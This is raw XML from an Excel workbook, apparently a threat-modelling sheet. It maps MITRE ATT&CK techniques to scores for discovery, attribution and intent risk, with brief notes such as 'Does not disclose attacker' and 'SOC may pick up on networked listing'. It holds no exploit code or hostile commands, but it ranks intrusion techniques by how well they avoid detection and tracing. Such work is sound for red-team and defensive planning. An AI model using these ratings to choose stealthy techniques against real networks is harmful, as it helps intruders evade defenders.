    <t>Screen Capture</t>
  </si>
  <si>
    <t>Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations.</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>Automated Exfiltration</t>
  </si>
  <si>
    <t>Exfiltration</t>
  </si>
  <si>
    <t>AOO-Exfil</t>
  </si>
  <si>
    <t>Data, such as sensitive documents, may be exfiltrated through the use of automated processing or Scripting after being gathered during Collection.
When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over Command and Control Channel and Exfiltration Over Alternative Protocol.</t>
  </si>
  <si>
    <t>Data Compressed</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</si>
  <si>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</si>
  <si>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</si>
  <si>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 and Exfiltration Over Alternative Protocol.</t>
  </si>
  <si>
    <t>Data Transfer Size Limits</t>
  </si>
  <si>
    <t>An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol</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</si>
  <si>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</si>
  <si>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Exfiltration Over Command and Control Channel</t>
  </si>
  <si>
    <t>Data exfiltration is performed over the Command and Control channel. Data is encoded into the normal communications channel using the same protocol as command and control communications.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Scheduled Transfer</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</si>
  <si>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</si>
  <si>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DiscV</t>
  </si>
  <si>
    <t>DiscDesc</t>
  </si>
  <si>
    <t>AttribV</t>
  </si>
  <si>
    <t>AttribDesc</t>
  </si>
  <si>
    <t>IntentV</t>
  </si>
  <si>
    <t>IntentDesc</t>
  </si>
  <si>
    <t>Execution through Module Load</t>
  </si>
  <si>
    <t>Discovery risk</t>
  </si>
  <si>
    <t>SOC</t>
  </si>
  <si>
    <t>Undetectable</t>
  </si>
  <si>
    <t>Anyone</t>
  </si>
  <si>
    <t>Attribution risk</t>
  </si>
  <si>
    <t>Enigma</t>
  </si>
  <si>
    <t>target suspect</t>
  </si>
  <si>
    <t>Strong suspicion</t>
  </si>
  <si>
    <t>Evidence</t>
  </si>
  <si>
    <t>Intent risk</t>
  </si>
  <si>
    <t>Strong indication</t>
  </si>
  <si>
    <t>Certainty</t>
  </si>
  <si>
    <t>indication intent</t>
  </si>
  <si>
    <t>rumours intent</t>
  </si>
  <si>
    <t>Detectionrisk is low due to advanced monitoring of individual machines</t>
  </si>
  <si>
    <t>Does not disclose attacker</t>
  </si>
  <si>
    <t>Does not disclose mission details</t>
  </si>
  <si>
    <t>Difficult to detect due to the API's available</t>
  </si>
  <si>
    <t>The targets may identify what the mission is about</t>
  </si>
  <si>
    <t>Unusual RDP sessions may give it away. Manipulated binaries as well</t>
  </si>
  <si>
    <t>If public RDP server is used, connection may be traced to attacker</t>
  </si>
  <si>
    <t>Target RDP server may hint towards mission's target</t>
  </si>
  <si>
    <t>SOC may pick up on networked listing</t>
  </si>
  <si>
    <t>Hint to target</t>
  </si>
  <si>
    <t>Origin of request can be identified, does not need to be a direct connection to attacker</t>
  </si>
  <si>
    <t>Generic request, not mission related</t>
  </si>
  <si>
    <t>Daily admin/AV</t>
  </si>
  <si>
    <t>Tools may be used that are known bad</t>
  </si>
  <si>
    <t>Too generic to tie to mission or attacker</t>
  </si>
  <si>
    <t>Needs extensive monitoring on local machine (registry and memory)</t>
  </si>
  <si>
    <t>Standard tooling is used, which may lead to logs/audit trails</t>
  </si>
  <si>
    <t>Very visible for system admins</t>
  </si>
  <si>
    <t>Registry setting monitoring</t>
  </si>
  <si>
    <t>Very visible for SOC</t>
  </si>
  <si>
    <t>If no protection used, traces back to attacker</t>
  </si>
  <si>
    <t>Data will contain mission sensitive information</t>
  </si>
  <si>
    <t>Hard to detect if API's are used</t>
  </si>
  <si>
    <t>May disclose target, thus hint to mission</t>
  </si>
  <si>
    <t>Advanced SOC/forensics</t>
  </si>
  <si>
    <t>Disk is altered</t>
  </si>
  <si>
    <t>Must be installed actively</t>
  </si>
  <si>
    <t>Extension must be loaded from a source that can be traced</t>
  </si>
  <si>
    <t>Very visible for admin</t>
  </si>
  <si>
    <t>OS usage is changed</t>
  </si>
  <si>
    <t>Due to variants hard to detect all versions</t>
  </si>
  <si>
    <t>Access is indistinguishable from regular use</t>
  </si>
  <si>
    <t>Very hard to detect, inf files may reside</t>
  </si>
  <si>
    <t>Hard to detect</t>
  </si>
  <si>
    <t>Easy to detect due to traffic</t>
  </si>
  <si>
    <t>The source is easily to detect</t>
  </si>
  <si>
    <t>Too generic to tie to mission or attacker but might hint</t>
  </si>
  <si>
    <t>Discrepancy between certificate owner/issuer and expected certified products may be indication</t>
  </si>
  <si>
    <t>Certificates are identifiable to organisation</t>
  </si>
  <si>
    <t>Disk and registry altered</t>
  </si>
  <si>
    <t>Networktraffic may generate IOC's</t>
  </si>
  <si>
    <t>Disk and SAM are altered</t>
  </si>
  <si>
    <t>Unusual traffic is easy detected</t>
  </si>
  <si>
    <t>LSA access generates log entries</t>
  </si>
  <si>
    <t>Read only access to files. Leaves practically no traces</t>
  </si>
  <si>
    <t>Read only access to registry. Leaves practically no traces</t>
  </si>
  <si>
    <t>Encoding is easily decoded</t>
  </si>
  <si>
    <t>Encoding is simply reversed, thus showing payload</t>
  </si>
  <si>
    <t>Harder to decode than regular encoding but decodable without secret</t>
  </si>
  <si>
    <t>Accumulation of large datastore is visible for administrators</t>
  </si>
  <si>
    <t>Payload, hint to mission, which may indicate target</t>
  </si>
  <si>
    <t>Payload is providing (one of) the outcome(s) of the mission</t>
  </si>
  <si>
    <t>With the right privileges, very hard to distinguis from legitimate use</t>
  </si>
  <si>
    <t>Process monitoring</t>
  </si>
  <si>
    <t>Disk altered</t>
  </si>
  <si>
    <t>Slowness and unsuspected activity might alert user</t>
  </si>
  <si>
    <t>Disk altered, slowness may occur</t>
  </si>
  <si>
    <t>Altering of system configuration</t>
  </si>
  <si>
    <t>Unusual activity within the process could be observed</t>
  </si>
  <si>
    <t>User may miss software running (such as Antivirus)</t>
  </si>
  <si>
    <t xml:space="preserve">Requires dedicated attention and monitoring </t>
  </si>
  <si>
    <t>Bad domains, reputation based analysis, malicious scripts</t>
  </si>
  <si>
    <t>Initial phase does not demonstrate mission</t>
  </si>
  <si>
    <t>Scanning for DDEAUTO and unusual processes with Office as parent</t>
  </si>
  <si>
    <t>Very hard to detect due to the high amount of false positives</t>
  </si>
  <si>
    <t>Indistinguisable from legitimate traffic</t>
  </si>
  <si>
    <t>Size of network traffic may generated addtional indicators</t>
  </si>
  <si>
    <t>Configuration changes</t>
  </si>
  <si>
    <t>Traces in registry</t>
  </si>
  <si>
    <t>Needs close proximity of threat actor</t>
  </si>
  <si>
    <t>Very hard to detect, instability may be an indicator</t>
  </si>
  <si>
    <t>Detectable due to IOC's</t>
  </si>
  <si>
    <t>Lateral movement may indicate targets of mission</t>
  </si>
  <si>
    <t>Very hard to detect due to the specifics of the attack</t>
  </si>
  <si>
    <t>Due to the static character (fallback must always be available) IOC's may exist.</t>
  </si>
  <si>
    <t>Monitoring for unexpected VPN and remote access tools can detect this.</t>
  </si>
  <si>
    <t>SOC may see increased search behavior</t>
  </si>
  <si>
    <t>Unusual binaries may occur in memory and on disk</t>
  </si>
  <si>
    <t>Local IDS may pick up on hash changes</t>
  </si>
  <si>
    <t xml:space="preserve">Del commands are not detected, secure wipes removes evidence </t>
  </si>
  <si>
    <t>Looking for opening of handles to drive volumes</t>
  </si>
  <si>
    <t>Needs physical access and may be visible for the good observer</t>
  </si>
  <si>
    <t>Needs physical access and traces back to a threat actor</t>
  </si>
  <si>
    <t>Threat actor may lead to objective mission</t>
  </si>
  <si>
    <t>Gui manipulations may be visible for good observers</t>
  </si>
  <si>
    <t>Rootkit detectors monitor for this</t>
  </si>
  <si>
    <t>Timing investigation of CPU instructions. This is very advanced</t>
  </si>
  <si>
    <t>Check for unusual parents to processes</t>
  </si>
  <si>
    <t>Process spawned might hint to mission</t>
  </si>
  <si>
    <t>Hidden files can easily be detected by automated tools</t>
  </si>
  <si>
    <t>File may indicate importance to attacker</t>
  </si>
  <si>
    <t>Lack of information coming from sensor</t>
  </si>
  <si>
    <t>N/A</t>
  </si>
  <si>
    <t>Lack of events on system is an indicator</t>
  </si>
  <si>
    <t>Multiple indicators up to physical devices</t>
  </si>
  <si>
    <t>In case of physical device, local presence is needed</t>
  </si>
  <si>
    <t>End-user visible</t>
  </si>
  <si>
    <t>System events and modules loaded</t>
  </si>
  <si>
    <t>Hash values will not be correct</t>
  </si>
  <si>
    <t>Enabling ticket auditing will identify this attack</t>
  </si>
  <si>
    <t>Spoofing detection tool makes this visible</t>
  </si>
  <si>
    <t>Attacker server may hint towards mission's target</t>
  </si>
  <si>
    <t>Filesystem altered</t>
  </si>
  <si>
    <t>Sender of the Office document may indicate of target</t>
  </si>
  <si>
    <t>Multiple indicators</t>
  </si>
  <si>
    <t>Modification of system files</t>
  </si>
  <si>
    <t>NTLM 3 logons without domain login</t>
  </si>
  <si>
    <t>Commands run</t>
  </si>
  <si>
    <t>Process monitoring and network communications</t>
  </si>
  <si>
    <t>Outdated process for proces invocation can be detected</t>
  </si>
  <si>
    <t>Indistinguisable from legitimate traffic/activities</t>
  </si>
  <si>
    <t>Login times and locations may be an indicator</t>
  </si>
  <si>
    <t>Physical access is required, therefore detection risk</t>
  </si>
  <si>
    <t>Physical access is required</t>
  </si>
  <si>
    <t>No artefacts generated</t>
  </si>
  <si>
    <t>Pattern/filesize/protocol may trigger incident response</t>
  </si>
  <si>
    <t>System events are raised</t>
  </si>
  <si>
    <t>Obvious detection method</t>
  </si>
  <si>
    <t>Link or file may be detected</t>
  </si>
  <si>
    <t>Link may have bad reputation, malicious content</t>
  </si>
  <si>
    <t>Needs interaction with end user</t>
  </si>
  <si>
    <t>Interaction target / agent is a risk</t>
  </si>
  <si>
    <t>Integrity scanning and detect unusual behavior</t>
  </si>
  <si>
    <t>Whitelisting of EFI binaries</t>
  </si>
  <si>
    <t>Uncommon data flows</t>
  </si>
  <si>
    <t>Little additional evidence towards agent</t>
  </si>
  <si>
    <t>Cryptography makes data unavailable</t>
  </si>
  <si>
    <t>Stepping stone party may be indicative</t>
  </si>
  <si>
    <t>Uncommon software may indicate</t>
  </si>
  <si>
    <t>Abnormal timestamps</t>
  </si>
  <si>
    <t>Needs access to second token</t>
  </si>
  <si>
    <t>User is required to take actions</t>
  </si>
  <si>
    <t>Monitoring for unusual usage of the accounts</t>
  </si>
  <si>
    <t>Monitoring for network usage</t>
  </si>
  <si>
    <t>Most of the time webcams have alerting lights</t>
  </si>
  <si>
    <t>Webcam may indicate that the target is part of the missions target</t>
  </si>
  <si>
    <t>WMI traffic can be identified</t>
  </si>
  <si>
    <t>Technique may contain mission details</t>
  </si>
  <si>
    <t>Monitor WinRM usage</t>
  </si>
  <si>
    <t>Monitor subscription entries</t>
  </si>
  <si>
    <t>Monitor changes in the webroot</t>
  </si>
  <si>
    <t>Commands may disclose mission details</t>
  </si>
  <si>
    <t>Reputation based analysis</t>
  </si>
  <si>
    <t>Access to high privilege network components can be monitored</t>
  </si>
  <si>
    <t>Montor WinRM usage</t>
  </si>
  <si>
    <t>Aantal van DiscV</t>
  </si>
  <si>
    <t>Very visible for 2</t>
  </si>
  <si>
    <t>Gemiddelde van DiscV</t>
  </si>
  <si>
    <t>Gemiddelde van AttribV</t>
  </si>
  <si>
    <t>Gemiddelde van IntentV</t>
  </si>
  <si>
    <t>Attack</t>
  </si>
  <si>
    <t>Exploit creation</t>
  </si>
  <si>
    <t>Rijlabels</t>
  </si>
  <si>
    <t>(leeg)</t>
  </si>
  <si>
    <t>Eindtotaal</t>
  </si>
  <si>
    <t>MNNAME</t>
  </si>
  <si>
    <t>The search may reveal the type of data looking for</t>
  </si>
  <si>
    <t>Scripting may potential contain information on attacker</t>
  </si>
  <si>
    <t>Credential usage may reveal the attacker</t>
  </si>
  <si>
    <t>Very noisy</t>
  </si>
  <si>
    <t>Very hard to distinguish from legitimate traffic</t>
  </si>
  <si>
    <t>Server behind the fronting can be identified and if public may be used to intercept</t>
  </si>
  <si>
    <t>Public services can be tied back to an attacker</t>
  </si>
  <si>
    <t>Tactic</t>
  </si>
  <si>
    <t>Average discovery risk</t>
  </si>
  <si>
    <t>Average Attribution risk</t>
  </si>
  <si>
    <t>Average Intent risk</t>
  </si>
  <si>
    <t>TECHNICAL DESCRIPTION FROM ATT@CK (MITRE)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</si>
</sst>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top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment wrapText="1"/>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1" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="1" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFill="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="1" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="164" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
  </cellXfs>
  <cellStyles count="1">
    <cellStyle name="Standaard" xfId="0" builtinId="0"/>
  </cellStyles>
  <dxfs count="9">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rbioncloud-my.sharepoint.com/personal/raymond_morsman_corbion_com/Documents/ATTACKLMK%20match%20Macbook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rbioncloud-my.sharepoint.com/personal/raymond_morsman_corbion_com/Documents/ATTACKLMK%20m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ques"/>
      <sheetName val="Tactic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ques"/>
      <sheetName val="Tactics"/>
    </sheet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gebruiker" refreshedDate="43242.869484606483" createdVersion="6" refreshedVersion="6" minRefreshableVersion="3" recordCount="217" xr:uid="{41BD7F8F-BA52-2440-B2DD-7D326F1612BD}">
  <cacheSource type="worksheet">
    <worksheetSource ref="A1:J1048576" sheet="Main values"/>
  </cacheSource>
  <cacheFields count="10">
    <cacheField name="ATTACKTECHNIQUENAME" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="ATTACKTACTICNAME" numFmtId="0">
      <sharedItems containsBlank="1" count="12">
        <s v="Discovery"/>
        <s v="Initial Access"/>
        <s v="Execution"/>
        <s v="Persistence"/>
        <s v="Command and Control"/>
        <s v="Privilege Escalation"/>
        <s v="Defense Evasion"/>
        <s v="Credential Access"/>
        <s v="Lateral Movement"/>
        <s v="Collection"/>
        <s v="Exfiltration"/>
        <m/>
      </sharedItems>
    </cacheField>
    <cacheField name="LMNAME" numFmtId="0">
      <sharedItems containsBlank="1" count="13">
        <s v="AOO-Lateral"/>
        <s v="AOO-Situationalawareness"/>
        <s v="AOO-Other"/>
        <s v="AOO-Collection"/>
        <s v="Delivery"/>
        <s v="Exploitation"/>
        <s v="Installation"/>
        <s v="C2"/>
        <s v="AOO-Privesc"/>
        <s v="AOO-Evasion"/>
        <s v="AOO-Cred"/>
        <s v="AOO-Exfil"/>
        <m/>
      </sharedItems>
    </cacheField>
    <cacheField name="TECHDESC" numFmtId="0">
      <sharedItems containsBlank="1" longText="1"/>
    </cacheField>
    <cacheField name="DiscV" numFmtId="1">
      <sharedItems containsString="0" containsBlank="1" containsNumber="1" containsInteger="1" minValue="0" maxValue="4"/>
    </cacheField>
    <cacheField name="DiscDesc" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="AttribV" numFmtId="1">
      <sharedItems containsString="0" containsBlank="1" containsNumber="1" containsInteger="1" minValue="0" maxValue="4"/>
    </cacheField>
    <cacheField name="AttribDesc" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="IntentV" numFmtId="1">
      <sharedItems containsString="0" containsBlank="1" containsNumber="1" containsInteger="1" minValue="0" maxValue="4"/>
    </cacheField>
    <cacheField name="IntentDesc"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gebruiker" refreshedDate="43243.813609143515" createdVersion="6" refreshedVersion="6" minRefreshableVersion="3" recordCount="218" xr:uid="{1C8C629D-C879-BC48-AFBD-CA35D232FDA9}">
  <cacheSource type="worksheet">
    <worksheetSource ref="A1:I1048576" sheet="NewFramework"/>
  </cacheSource>
  <cacheFields count="9">
    <cacheField name="ATTACKTECHNIQUENAME" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="MNNAME" numFmtId="0">
      <sharedItems containsBlank="1" count="13">
        <s v="AOO-Lateral"/>
        <s v="AOO-Situationalawareness"/>
        <s v="AOO-Collection"/>
        <s v="Attack"/>
        <s v="Exploit creation"/>
        <s v="Exploitation"/>
        <s v="Persistence"/>
        <s v="C2"/>
        <s v="AOO-Privesc"/>
        <s v="AOO-Evasion"/>
        <s v="AOO-Cred"/>
        <s v="AOO-Exfil"/>
        <m/>
      </sharedItems>
    </cacheField>
    <cacheField name="TECHDESC" numFmtId="0">
      <sharedItems containsBlank="1" longText="1"/>
    </cacheField>
    <cacheField name="DiscV" numFmtId="1">
      <sharedItems containsString="0" containsBlank="1" containsNumber="1" containsInteger="1" minValue="0" maxValue="4"/>
    </cacheField>
    <cacheField name="DiscDesc" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="AttribV" numFmtId="1">
      <sharedItems containsString="0" containsBlank="1" containsNumber="1" containsInteger="1" minValue="0" maxValue="4"/>
    </cacheField>
    <cacheField name="AttribDesc" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="IntentV" numFmtId="1">
      <sharedItems containsString="0" containsBlank="1" containsNumber="1" containsInteger="1" minValue="0" maxValue="4"/>
    </cacheField>
    <cacheField name="IntentDesc"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
  <r>
    <s v="Account Discovery"/>
    <x v="0"/>
    <x v="0"/>
    <s v="Adversaries may attempt to get a listing of local system or domain accounts."/>
    <n v="2"/>
    <s v="SOC may pick up on networked listing"/>
    <n v="1"/>
    <s v="Origin of request can be identified, does not need to be a direct connection to attacker"/>
    <n v="0"/>
    <s v="Generic request, not mission related"/>
  </r>
  <r>
    <s v="Application Window Discovery"/>
    <x v="0"/>
    <x v="1"/>
    <s v="Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger"/>
    <n v="1"/>
    <s v="Needs extensive monitoring on local machine (registry and memory)"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Browser Bookmark Discovery"/>
    <x v="0"/>
    <x v="2"/>
    <s v="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_x000a__x000a_Browser bookmarks may also highlight additional targets after an adversary has access to valid credentials, especially Credentials in Files associated with logins cached by a browser._x000a__x000a_Specific storage locations vary based on platform and/or application, but browser bookmarks are typically stored in local files/databases"/>
    <n v="0"/>
    <s v="Hard to detect if API's are used"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="May disclose target, thus hint to mission"/>
  </r>
  <r>
    <s v="File and Directory Discovery"/>
    <x v="0"/>
    <x v="3"/>
    <s v="Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system."/>
    <n v="2"/>
    <s v="SOC may see increased search behavior"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Network Service Scanning"/>
    <x v="0"/>
    <x v="1"/>
    <s v="Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system."/>
    <n v="2"/>
    <s v="Networktraffic may generate IOC's"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Network Share Discovery"/>
    <x v="0"/>
    <x v="3"/>
    <s v="Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network."/>
    <n v="2"/>
    <s v="Networktraffic may generate IOC's"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Password Policy Discovery"/>
    <x v="0"/>
    <x v="2"/>
    <s v="_x000a_Password Policy Discovery_x000a_Technique_x000a_ID T1201_x000a_Tactic Discovery_x000a_Platform Linux, Windows, macOS_x000a_Permissions Required User_x000a_Data Sources Process command-line parameters, Process Monitoring_x000a_Contributors Sudhanshu Chauhan, @Sudhanshu_C_x000a_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n v="2"/>
    <s v="N/A"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Peripheral Device Discovery"/>
    <x v="0"/>
    <x v="1"/>
    <s v="Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. The information may be used to enhance their awareness of the system and network environment or may be used for further actions."/>
    <n v="2"/>
    <s v="Commands run"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Permission Groups Discovery"/>
    <x v="0"/>
    <x v="1"/>
    <s v="Adversaries may attempt to find local system or domain-level groups and permissions settings."/>
    <n v="2"/>
    <s v="Commands run"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Process Discovery"/>
    <x v="0"/>
    <x v="1"/>
    <s v="Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network."/>
    <n v="2"/>
    <s v="Commands run"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Query Registry"/>
    <x v="0"/>
    <x v="1"/>
    <s v="Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software._x000a__x000a_The Registry contains a significant amount of information about the operating system, configuration, software, and security.1 Some of the information may help adversaries to further their operation within a network."/>
    <n v="0"/>
    <s v="Indistinguisable from legitimate traffic/activities"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Remote System Discovery"/>
    <x v="0"/>
    <x v="1"/>
    <s v="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n v="2"/>
    <s v="Networktraffic may generate IOC's"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Security Software Discovery"/>
    <x v="0"/>
    <x v="1"/>
    <s v="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n v="0"/>
    <s v="Indistinguisable from legitimate traffic/activities"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="System Information Discovery"/>
    <x v="0"/>
    <x v="1"/>
    <s v="An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture."/>
    <n v="1"/>
    <s v="Process monitoring"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="System Network Configuration Discovery"/>
    <x v="0"/>
    <x v="1"/>
    <s v="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
    <n v="1"/>
    <s v="Process monitoring"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="System Network Connections Discovery"/>
    <x v="0"/>
    <x v="1"/>
    <s v="Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network."/>
    <n v="1"/>
    <s v="Process monitoring and network communications"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="System Owner/User Discovery"/>
    <x v="0"/>
    <x v="1"/>
    <s v="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
    <n v="1"/>
    <s v="Process monitoring"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="System Service Discovery"/>
    <x v="0"/>
    <x v="1"/>
    <s v="Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are &quot;sc,&quot; &quot;tasklist /svc&quot; using Tasklist, and &quot;net start&quot; using Net, but adversaries may also use other tools as well."/>
    <n v="1"/>
    <s v="Process monitoring"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="System Time Discovery"/>
    <x v="0"/>
    <x v="1"/>
    <s v="The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.12_x000a__x000a_An adversary may gather the system time and/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2 The information could be useful for performing other techniques, such as executing a file with a Scheduled Task3, or to discover locality information based on time zone to assist in victim targeting."/>
    <n v="1"/>
    <s v="Process monitoring"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Drive-by Compromise"/>
    <x v="1"/>
    <x v="4"/>
    <s v="A drive-by compromise is when an adversary gains access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is targeted for exploitation. This can happen in several ways, but there are a few main components:_x000a_Multiple ways of delivering exploit code to a browser exist, including:_x000a__x000a_A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, cross-site scripting._x000a_Malicious ads are paid for and served through legitimate ad providers._x000a_Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content)._x000a_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1_x000a__x000a_Typical drive-by compromise process:_x000a__x000a_A user visits a website that is used to host the adversary controlled content._x000a_Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version._x000a_The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes._x000a_Upon finding a vulnerable version, exploit code is delivered to the browser._x000a_If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place._x000a_In some cases a second visit to the website after the initial scan is required before exploit code is delivered._x000a_Unlike Exploit Public-Facing Application, the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ."/>
    <n v="2"/>
    <s v="Bad domains, reputation based analysis, malicious scripts"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="0"/>
    <s v="Initial phase does not demonstrate mission"/>
  </r>
  <r>
    <s v="Exploit Public-Facing Application"/>
    <x v="1"/>
    <x v="4"/>
    <s v="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2, standard services (like SMB3 or SSH), and any other applications with Internet accessible open sockets, such as web servers and related services.4 Depending on the flaw being exploited this may include Exploitation for Defense Evasion. For websites and databases, the OWASP top 10 gives a good list of the top 10 most common web-based vulnerabilities"/>
    <n v="2"/>
    <s v="Detectable due to IOC's"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Hardware Additions"/>
    <x v="1"/>
    <x v="4"/>
    <s v="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6, man-in-the middle encryption breaking7, keystroke injection8, kernel memory reading via DMA9, adding new wireless access to an existing network10, and others."/>
    <n v="4"/>
    <s v="Needs physical access and may be visible for the good observer"/>
    <n v="4"/>
    <s v="Needs physical access and traces back to a threat actor"/>
    <n v="2"/>
    <s v="Threat actor may lead to objective mission"/>
  </r>
  <r>
    <s v="Replication Through Removable Media"/>
    <x v="1"/>
    <x v="4"/>
    <s v="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n v="4"/>
    <s v="Physical access is required, therefore detection risk"/>
    <n v="4"/>
    <s v="Physical access is required"/>
    <n v="3"/>
    <s v="Physical access is required"/>
  </r>
  <r>
    <s v="Spearphishing Attachment"/>
    <x v="1"/>
    <x v="4"/>
    <s v="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n v="4"/>
    <s v="Needs interaction with end user"/>
    <n v="4"/>
    <s v="Interaction target / agent is a risk"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Spearphishing Link"/>
    <x v="1"/>
    <x v="4"/>
    <s v="Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attachment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
    <n v="2"/>
    <s v="Link may have bad reputation, malicious content"/>
    <n v="4"/>
    <s v="Interaction target / agent is a risk"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Spearphishing via Service"/>
    <x v="1"/>
    <x v="4"/>
    <s v="Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels._x000a_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_x000a__x000a_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
    <n v="2"/>
    <s v="Link or file may be detected"/>
    <n v="4"/>
    <s v="Interaction target / agent is a risk"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Supply Chain Compromise"/>
    <x v="1"/>
    <x v="4"/>
